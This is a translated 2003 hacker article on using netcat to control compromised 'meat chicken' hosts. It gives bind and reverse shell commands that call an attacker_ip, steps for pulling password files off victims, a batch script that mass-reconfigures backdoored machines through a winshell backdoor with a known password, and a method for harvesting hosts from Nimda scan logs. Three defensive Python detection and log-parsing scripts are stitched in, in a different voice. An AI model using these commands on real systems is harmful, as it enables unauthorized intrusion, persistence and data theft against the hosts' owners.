A compilation of advanced nc.exe techniques | http://www.cshu.net
            A compilation of advanced nc.exe techniques
            www.cshu.net  2003-4-12  Fog Rain Village

              Article author: Zhoutree 
              0. Preface
              1. Netcat 1.10 for NT - nc11nt.zip, the original English information
              2. Netcat 1.10 for NT help text
              3. Commonly used Netcat 1.10 command lines
              4. Managing compromised hosts; changing their configuration
              5. Download links
              6. Afterword
              ######################################################################
              0. Preface
              ######################################################################
              Work has been fairly idle recently, and I kept thinking about how to
              telnet to my compromised hosts ("meat chickens") automatically and run
              commands on them automatically, so as to manage my own compromised hosts.
              As for writing a program myself: my basic skills are lacking, so all I
              could do was read nc's help text, and although I only understood part of
              it, with the help of Kingsoft PowerWord 2002 I did understand something.
              I feel it is necessary to summarize it once more. In any case, it mainly
              meets my own needs.
              ######################################################################
              1. Netcat 1.10 for NT - nc11nt.zip (the original English information)
              ######################################################################
              Basic Features
              * Outbound or inbound connections, TCP or UDP, to or from any 
ports
              * Full DNS forward/reverse checking, with appropriate warnings
              * Ability to use any local source port
              * Ability to use any locally-configured network source address
              * Built-in port-scanning capabilities, with randomizer
              * Can read command line arguments from standard input
              * Slow-send mode, one line every N seconds
              * Hex dump of transmitted and received data
              * Ability to let another program service established connections
              * Telnet-options responder
              New for NT
              * Ability to run in the background without a console window
              * Ability to restart as a single-threaded server to handle a new connection
              ________________________________________________________________________
              Some of the features of netcat are: 
              Outbound or inbound connections, TCP or UDP, to or from any ports 
              Full DNS forward/reverse checking, with appropriate warnings 
              Ability to use any local source port 
              Ability to use any locally-configured network source address 
              Built-in port-scanning capabilities, with randomizer 
              Built-in loose source-routing capability 
              Can read command line arguments from standard input 
              Slow-send mode, one line every N seconds 
              Optional ability to let another program service inbound 
              connections 
              Some of the potential uses of netcat: 
              Script backends 
              Scanning ports and inventorying services 
              Backup handlers 
              File transfers 
              Server testing and simulation 
              Firewall testing 
              Proxy gatewaying 
              Network performance testing 
              Address spoofing tests 
              Protecting X servers 
              1,001 other uses you'll likely come up with
              Netcat + Encryption = Cryptcat
              Compared with Windows 2000's Microsoft telnet.exe and Microsoft's
              tlntsvr.exe service (the difference is visible at connection time):
              1.1 NC.EXE is a non-standard telnet client program.
              1.2 There is also the putty.exe client program, which provides four
              connection modes: -raw, -telnet, -rlogin and -ssh.
              ######################################################################
              2. Netcat 1.10 for NT help text
              ######################################################################
              C:\WINDOWS\Desktop>nc -h
              [v1.10 NT]
              connect to somewhere:   nc [-options] hostname port[s] [ports] ...
              listen for inbound:     nc -l -p port [options] [hostname] [port]
              options:
                -d              detach from console, background mode (run in the background)
                -e prog         inbound program to exec [dangerous!!]
                -g gateway      source-routing hop point[s], up to 8
                -G num          source-routing pointer: 4, 8, 12, ...
                -h              this cruft (this help text)
                -i secs         delay interval for lines sent, ports scanned (delay time)
                -l              listen mode, for inbound connects (listen mode: wait for a connection)
                -L              listen harder, re-listen on socket close (keep listening after the connection closes)
                -n              numeric-only IP addresses, no DNS (numeric IP mode, no DNS resolution)
                -o file         hex dump of traffic (hex dump written to a file, three columns)
                -p port         local port number (local port)
                -r              randomize local and remote ports (random local and remote ports)
                -s addr         local source address (local source address)
                -t              answer TELNET negotiation
                -u              UDP mode
                -v              verbose [use twice to be more verbose] (-vv for more information)
                -w secs         timeout for connects and final net reads
                -z              zero-I/O mode [used for scanning] (scan mode; use with -vv)
              port numbers can be individual or ranges: m-n [inclusive]
              ######################################################################
              3. Commonly used Netcat 1.10 command lines
              ######################################################################
              Part of this section is quoted from the article by "Deep Sleep, Not Awake"
              (dated before dawn on October 15).
              3.1. Port probing:
              nc -vv ip port
              RIVER [192.168.0.198] 19190 (?) open // shows whether the port is open
              3.2. Scanning:
              nc -vv -w 5 ip port-port port
              nc -vv -z ip port-port port
              Scanning like this leaves a lot of traces, and the system administrator
              will become extra careful.
              3.3. Backdoors:
              Victim machine: // the victim's machine
              nc -l -p port -e cmd.exe // win2000
              nc -l -p port -e /bin/sh // unix, linux
              Attacker machine: // the attacker's machine
              nc ip -p port // connect to victim_IP and obtain a shell.

              3.4. Reverse connection:
              Attacker machine: // typically after a sql2.exe or webdavx3.exe remote
              // overflow attack, or a wollf reverse connection
              nc -vv -l -p port
              Victim machine:
              nc -e cmd.exe attacker_ip -p port
              nc -e /bin/sh attacker_ip -p port
              Or:
              Attacker machine:
              nc -vv -l -p port1 /* used for input */
              nc -vv -l -p port2 /* used for displaying output */
              Victim machine:
              nc attacker_ip port1 | cmd.exe | nc attacker_ip port2
              nc attacker_ip port1 | /bin/sh | nc attacker_ip port2
              For port 139 you must add the -s parameter (nc.exe -L -p 139 -d -e cmd.exe -s
              <the other machine's IP>).
              This ensures nc.exe gets port 139 ahead of NetBIOS.
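The defender's counterpart to 3.3 and 3.4 is spotting these invocations in process-creation telemetry. The script below is an added example, not code from the original article: it reads constructed "time|host|parent|command line" log lines (that layout is an assumption, not any real product's schema), walks the nc 1.10 options exactly as the help text in section 2 defines them (-e takes the program to bind, -l/-L listen, -d detaches, -z and a port range mean scanning), and labels each netcat invocation as a bind shell, reverse shell, plain listener, port scan or ordinary outbound connection. The high-severity cases are the ones where -e is present, with the parent image kept so an office application spawning nc stands out.

```python
"""Classify netcat command lines found in process-creation logs.

Added example for this article; not part of the original page. The log
layout "time|host|parent image|command line" and the events below are
constructed for the example, not taken from any real product's schema.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample process-creation events.
SAMPLE_EVENTS = r"""
2003-04-12 10:01:03|ws01|explorer.exe|nc.exe -l -p 4444 -e cmd.exe
2003-04-12 10:02:11|ws01|cmd.exe|nc -vv -w 5 192.0.2.10 1-1024
2003-04-12 10:03:40|srv02|services.exe|nc.exe -L -p 139 -d -e cmd.exe -s 192.0.2.5
2003-04-12 10:04:02|srv02|cmd.exe|nc -vv 192.0.2.20 80
2003-04-12 10:05:19|ws03|winword.exe|nc.exe -d -e cmd.exe 198.51.100.7 53
2003-04-12 10:06:00|ws03|cmd.exe|nc -d 198.51.100.7 9999 < C:\temp\file.cmd
2003-04-12 10:07:44|ws01|explorer.exe|notepad.exe C:\notes.txt
"""

NC_IMAGES = {"nc", "nc.exe"}
VALUE_OPTS = set("egGiopsw")           # nc 1.10 options that take an argument
PORT_RANGE = re.compile(r"^\d+-\d+$")   # e.g. 1-1024, as in "nc -vv -z ip port-port"


@dataclass
class Finding:
    time: str
    host: str
    parent: str
    kind: str       # bind_shell | reverse_shell | listener | port_scan | outbound_connect
    severity: str   # high | medium | low
    detail: str
    cmdline: str


def classify_nc(argv: List[str]) -> Optional[Tuple[str, str, str]]:
    """Return (kind, severity, detail) for a netcat argv, or None if the
    image is not netcat. Options are walked letter by letter so bundled
    forms like -vv and attached values like -p4444 are both handled."""
    image = argv[0].lower().rsplit("\\", 1)[-1]
    if image not in NC_IMAGES:
        return None
    listen = background = zero_io = False
    exec_prog = None
    positional: List[str] = []
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("-") and len(tok) > 1:
            j = 1
            while j < len(tok):
                ch = tok[j]
                if ch in VALUE_OPTS:
                    value = tok[j + 1:]
                    if not value:                 # the value is the next token
                        i += 1
                        value = argv[i] if i < len(argv) else ""
                    if ch == "e":
                        exec_prog = value
                    break                         # a value ends this token
                if ch in "lL":
                    listen = True
                elif ch == "d":
                    background = True
                elif ch == "z":
                    zero_io = True
                j += 1
        else:
            positional.append(tok)
        i += 1
    flags = " (detached from console)" if background else ""
    if exec_prog and listen:
        return "bind_shell", "high", f"{exec_prog} bound to inbound connections{flags}"
    if exec_prog:
        return "reverse_shell", "high", f"{exec_prog} bound to an outbound connection{flags}"
    if listen:
        return "listener", "medium", "listening for inbound connections" + flags
    if zero_io or any(PORT_RANGE.match(p) for p in positional):
        return "port_scan", "medium", "port range or zero-I/O scan: " + " ".join(positional)
    return "outbound_connect", "low", "outbound connection: " + " ".join(positional)


def scan_events(text: str) -> List[Finding]:
    """Parse the log text and return one Finding per netcat invocation."""
    findings = []
    for line in text.strip().splitlines():
        time, host, parent, cmdline = line.split("|", 3)
        result = classify_nc(cmdline.split())
        if result is None:
            continue
        kind, severity, detail = result
        findings.append(Finding(time, host, parent, kind, severity, detail, cmdline))
    return findings


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f.severity:6} {f.kind:16} {f.host} parent={f.parent}: {f.detail}")
```

Renamed copies of nc.exe defeat the image-name check, so in practice the same option walk is worth applying to any process whose command line carries "-e" together with a shell name, and the parent image is the field to alert on first.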

              3.5. File transfer:
              3.5.1 attacker machine <-- victim machine // pull the password file back
              from the compromised host
              nc -d -l -p port < path\filedest /* attacker machine */ can be run from a shell
              nc -vv attacker_ip port > path\file.txt /* victim machine */ needs Ctrl+C to exit
              // On the compromised host this has to be run from cmd.exe inside a GUI
              // session (a terminal services login; less convenient than installing FTP),
              // otherwise there is no way to send Ctrl+C.
              3.5.2 attacker machine --> victim machine // push a command file to the
              compromised host
              nc -vv -l -p port > path\file.txt /* victim machine */ needs Ctrl+C to exit
              nc -d victim_ip port < path\filedest /* attacker machine */ can be run from a shell
              // This works quite well: we log in to terminal services, and when moving on
              // to other compromised hosts we can choose to log in in shell mode.
              Conclusion: ASCII and binary files can be transferred; program files can be
              transferred.
              Question: after connecting to an IP and completing the transfer, Ctrl+C has
              to be sent to exit nc.exe. Alternatively, connect once more and kill the
              process with pskill.exe, but is the file handle that the transfer opened
              then released?

              3.6 Capturing the data on a port
              nc -vv -w 2 -o test.txt www.xfocus.net 80 21-15
              < 00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Syntax error
              < 00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , command "" unr
              < 00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a             # ecognized...
              < 00000084 83 00 00 01 8f                                  # .....
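The -o dump above is the format a responder most often has to read back when nc was used to capture a session: one line per chunk, with the direction ("<" received, ">" sent), an 8-digit hex offset within that direction's stream, up to 16 hex bytes, and a "#" column showing the printable ASCII. The parser below is an added example, not code from the original article; it reassembles each direction into a byte stream, reports offset gaps (a sign of a truncated or edited dump) and checks that the ASCII column agrees with the hex. The four "<" lines are the article's own test.txt capture as reconstructed above; the ">" line is constructed to show the sent direction.

```python
"""Parse netcat 1.10 "-o file" hex dumps back into byte streams.

Added example for this article, not code from the original page. The four
"<" lines come from the article's own test.txt capture (reconstructed);
the ">" line is constructed to show the sent direction.
"""
import re
from typing import Dict, List, Tuple

SAMPLE_DUMP = """
> 00000000 47 45 54 20 2f 20 48 54 54 50 2f 31 2e 30 0d 0a # GET / HTTP/1.0..
< 00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Syntax error
< 00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , command "" unr
< 00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a             # ecognized...
< 00000084 83 00 00 01 8f                                  # .....
"""

# direction, 8-digit hex offset, 1..16 hex bytes, "#", printable column
DUMP_LINE = re.compile(
    r"^(?P<dir>[<>])\s+(?P<off>[0-9a-fA-F]{8})\s+"
    r"(?P<hex>(?:[0-9a-fA-F]{2}\s+)*[0-9a-fA-F]{2})\s+#\s?(?P<text>.*)$"
)


def printable(data: bytes) -> str:
    """Mirror nc's ASCII column: bytes outside 0x20..0x7e become '.'."""
    return "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in data)


def parse_hexdump(text: str) -> Tuple[Dict[str, bytes], List[Tuple[str, int, int]], List[int]]:
    """Return ({direction: bytes}, gaps, mismatches).

    gaps lists (direction, expected_offset, seen_offset) wherever a line's
    offset does not continue the previous line for that direction. The
    first line of each direction sets its starting offset, so a capture
    that begins mid-stream (the article's starts at 0x58) is not a gap.
    mismatches lists line numbers whose ASCII column disagrees with the hex.
    """
    streams: Dict[str, bytearray] = {}
    expected: Dict[str, int] = {}
    gaps: List[Tuple[str, int, int]] = []
    mismatches: List[int] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.rstrip()
        if not line:
            continue
        m = DUMP_LINE.match(line)
        if m is None:
            raise ValueError(f"line {lineno}: not a netcat -o dump line: {raw!r}")
        direction = m["dir"]
        offset = int(m["off"], 16)
        data = bytes.fromhex(m["hex"])          # fromhex tolerates the spaces
        if direction in expected and offset != expected[direction]:
            gaps.append((direction, expected[direction], offset))
        if printable(data) != m["text"].rstrip():
            mismatches.append(lineno)
        streams.setdefault(direction, bytearray()).extend(data)
        expected[direction] = offset + len(data)
    return {d: bytes(b) for d, b in streams.items()}, gaps, mismatches


if __name__ == "__main__":
    streams, gaps, mismatches = parse_hexdump(SAMPLE_DUMP)
    for direction, data in streams.items():
        label = "sent" if direction == ">" else "received"
        print(f"{label}: {len(data)} bytes: {printable(data)!r}")
    print("gaps:", gaps, "ascii mismatches:", mismatches)
```

Reassembling by offset rather than by line order matters because nc writes the two directions interleaved as they arrive; the received side here decodes to the server's "500 Syntax error, command "" unrecognized." reply followed by five non-printable bytes, which is the kind of detail the "#" column alone hides.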

              3.7 Telnet with automatic batch execution. ***** This is the thing I most
              want to recommend.
              nc victim_ip port < path\file.cmd /* victim machine */ shows the execution
              nc -vv victim_ip port < path\file.cmd /* victim machine */ shows the execution
              nc -d victim_ip port < path\file.cmd quiet mode
              _______________file.cmd________________________
              password
              cd %windir%
              echo [ ] = [ %windir% ]
              c:
              cd \
              md test
              cd /d %windir%\system32\
              net stop sksockserver
              snake.exe -config port 11111
              net start sksockserver
              exit
              _______________file.cmd__END___________________
              ######################################################################
              4. Managing compromised hosts; changing their configuration
              ######################################################################
              4.1 For example, to change the proxy port of the snake.exe service above to
              11111 on all compromised hosts at once; the service name is "sksockserver".
              It uses the winshell backdoor on port 1234 with the password "password".
              The command line is:
              modi.bat youip.txt
              ___________modi.bat____________________________
              @if "%1" == "" echo Error: No ip.txt &&goto END
              :start
              @echo password >a.cmd
              @echo s >>a.cmd
              @echo cd /d %%windir%%\system32\ >>a.cmd
              @echo net stop "sksockserver" >>a.cmd
              @echo snake.exe -config port 11111 >>a.cmd
              @echo net start "sksockserver" >>a.cmd
              @echo exit >>a.cmd
              :auto
              @for /f "eol=; tokens=1,2" %%i in (%1) do @(nc.exe -vv -w 3 %%i 1234 < a.cmd)
              :END
              ___________modi.bat__END_______________________

              4.2
              @echo off
              color f0
              :start
              cls
              c:\nc -vv -w 3 -l -p 80 >>80.txt
              goto start
              Run this batch file with the firewall switched off, and it will log a great
              many probes for the Unicode vulnerability, mostly the Nimda virus scanning
              you in groups. This way you can obtain compromised hosts; the quality is not
              high, but it is also a cheap method.
              Characteristics of these compromised hosts:
              1. The Unicode vulnerability
              2. The guest password is empty, and guest is in the administrators group
              3. Other vulnerabilities
              Go and enjoy it slowly yourself. But, to emphasize once more: I do not
              recommend it, and you must not damage domestic hosts. Later a renamed
              tftp.exe is uploaded, then the mmc.exe process is killed with pskill. Once
              the backdoor is in place, disable the guest account to fend off the
              point-and-click scanners.
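Read from the other side, the 80.txt file that the listener in 4.2 appends to is a probe log: in verbose mode nc 1.10 prints a "connect to [local] from name [source ip] port" line for each connection, followed by whatever the client sent, so the file records who is scanning and for what. The script below is an added example, not code from the original article: it walks a constructed 80.txt (the "connect to" lines follow nc's verbose format; the request lines use the publicly documented Nimda and IIS Unicode/double-decode traversal probe strings), labels each request and tallies the probing sources, which is the list a defender would feed to a firewall or abuse report.

```python
"""Summarize web probes captured by "nc -vv -l -p 80 >>80.txt" (section 4.2).

Added example for this article, not part of the original page. The log
below is constructed; the "connect to [...] from ... [...] port" lines are
in the format nc 1.10 prints in verbose mode, and the request lines use the
publicly documented Unicode-traversal and Nimda probe strings.
"""
import re
from collections import Counter, defaultdict
from typing import Dict, List, Optional, Tuple

SAMPLE_80_TXT = r"""
listening on [any] 80 ...
connect to [192.0.2.5] from (UNKNOWN) [198.51.100.9] 3312
GET /scripts/root.exe?/c+dir HTTP/1.0
connect to [192.0.2.5] from (UNKNOWN) [198.51.100.9] 3320
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
connect to [192.0.2.5] from (UNKNOWN) [203.0.113.44] 1044
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
connect to [192.0.2.5] from (UNKNOWN) [203.0.113.44] 1051
GET /MSADC/root.exe?/c+dir HTTP/1.0
connect to [192.0.2.5] from host7.example [192.0.2.77] 2201
GET /index.html HTTP/1.1
connect to [192.0.2.5] from (UNKNOWN) [198.51.100.9] 3333
GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
"""

CONNECT_LINE = re.compile(r"^connect to \[[^\]]+\] from \S+ \[(?P<ip>[^\]]+)\] (?P<port>\d+)$")
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d$")

# Ordered so the most specific label wins.
SIGNATURES: List[Tuple[str, "re.Pattern[str]"]] = [
    ("nimda_root_exe", re.compile(r"/root\.exe\?", re.I)),
    ("double_decode_traversal", re.compile(r"%25(5c|2f)", re.I)),
    ("unicode_traversal", re.compile(r"%c0%af|%c1%9c|%c1%1c", re.I)),
    ("cmd_exe_request", re.compile(r"/cmd\.exe\?", re.I)),
]


def classify_request(target: str) -> Optional[str]:
    """Label a request target by the first matching probe signature, else None."""
    for label, pattern in SIGNATURES:
        if pattern.search(target):
            return label
    return None


def summarize(text: str) -> Dict[str, Counter]:
    """Return {source_ip: Counter(label -> count)}; unmatched requests count as "benign".

    A request line is attributed to the most recent "connect to" line, which
    is how nc's verbose output interleaves them in the captured file."""
    per_source: Dict[str, Counter] = defaultdict(Counter)
    current_ip = None
    for line in text.strip().splitlines():
        m = CONNECT_LINE.match(line)
        if m:
            current_ip = m["ip"]
            continue
        m = REQUEST_LINE.match(line)
        if m and current_ip:
            per_source[current_ip][classify_request(m["target"]) or "benign"] += 1
    return dict(per_source)


def probing_sources(summary: Dict[str, Counter]) -> List[str]:
    """Source IPs with at least one non-benign request, busiest first."""
    hits = {ip: sum(n for lbl, n in c.items() if lbl != "benign") for ip, c in summary.items()}
    return sorted((ip for ip, n in hits.items() if n), key=lambda ip: -hits[ip])


if __name__ == "__main__":
    summary = summarize(SAMPLE_80_TXT)
    for ip in probing_sources(summary):
        print(ip, dict(summary[ip]))
```

Because nc -L re-listens for one connection at a time, a busy scanner produces one "connect to" line per request, so the per-source counts here also approximate how many connection attempts each worm-infected host made.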
              ######################################################################
              5. Download links
              ######################################################################
              5.1 http://www.atstake.com/research/tools/network_utilities/
              Tool: Netcat 1.10 for Unix 
              Version: 03.20.96 
              Platforms: *nix
              Tool: Netcat 1.1 for Win 95/98/NT/2000 
              Version: 02.08.98 
              Platforms: Runs on Win 95/98/NT/2000 

              5.2 http://www.xfocus.net/download.php?Id=320
              Name: Cryptcat_nt.zip   Updated: 2002-04-05
              Category: Network tools   Platform: Win9x/NT/2000   Size: 115.8K
              Submitted by: Maxilaw
              Summary: nc with encrypted transmission.
              5.3 http://content.443.ch/pub/security/blackhat/Networking/nc/
              (overseas website)
              10.03.02 15:48 1,305 cryptcat.txt
              10.03.02 15:48 245,760 cryptcat_linux2.tar
              10.03.02 15:48 118,533 cryptcat_nt.zip

              ######################################################################
              6. Afterword
              ######################################################################
              I will only be able to get online tomorrow, to find a win2000 server with
              terminal services and test it.
              I am still on a broken win98, so there is no way to do it.
              Try it and think about it; you may be able to use it for more things. You
              can also look at the scripts under the scripts directory in nc110.tgz to
              get some ideas.
              I do not have the nc110.tgz package here; I will search google.com for it
              tomorrow.
              I am not that familiar with the Unix commands either.


